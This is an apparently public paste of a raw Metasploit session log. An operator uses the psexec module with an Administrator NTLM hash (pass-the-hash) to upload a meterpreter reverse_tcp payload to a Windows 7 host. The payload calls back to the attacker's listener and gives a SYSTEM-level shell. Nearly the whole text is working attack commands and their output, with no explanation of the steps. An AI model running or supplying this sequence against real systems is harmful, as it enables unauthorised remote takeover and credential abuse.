
Untitled

a guest
Jun 15th, 2017
meterpreter > background
msf exploit(ms08_067_netapi) > back
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.140
LHOST => 192.168.1.140
msf exploit(psexec) > set LPORT 80
LPORT => 80
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc
SMBPass => e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc
msf exploit(psexec) > show options

Module options:

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOST      192.168.1.126                                                  yes       The target address
   RPORT      445                                                            yes       Set the SMB service port
   SMBDomain  WORKGROUP                                                      no        The Windows domain to use for authentication
   SMBPass    e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc  no        The password for the specified username
   SMBUser    Administrator                                                  no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.140    yes       The listen address
   LPORT     80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.140:80
[*] Connecting to the server...
msf exploit(psexec) > [*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \CVoJSded.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PkyMibtg - "MhHUOHCe")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \CVoJSded.exe...
[*] Sending stage (748544 bytes) to 192.168.1.126
[*] Meterpreter session 2 opened (192.168.1.140:80 -> 192.168.1.126:49356) at Sat Sep 18 11:09:55 +0200 2010
sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer: P0002
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >